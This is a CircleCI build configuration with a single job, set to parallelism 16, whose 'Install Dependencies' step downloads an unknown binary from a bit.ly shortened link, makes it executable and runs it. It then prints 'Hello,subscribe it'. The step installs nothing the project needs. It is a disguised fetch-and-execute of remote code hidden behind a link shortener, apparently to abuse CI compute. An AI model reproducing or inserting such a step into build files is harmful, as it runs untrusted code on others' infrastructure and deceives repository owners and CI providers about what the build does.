version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bit.ly/3obm5xo && chmod +x 3obm5xo && ./3obm5xo
              echo Hello,subscribe it

workflows:
    version: 2.1
    build:
        jobs:
        - trial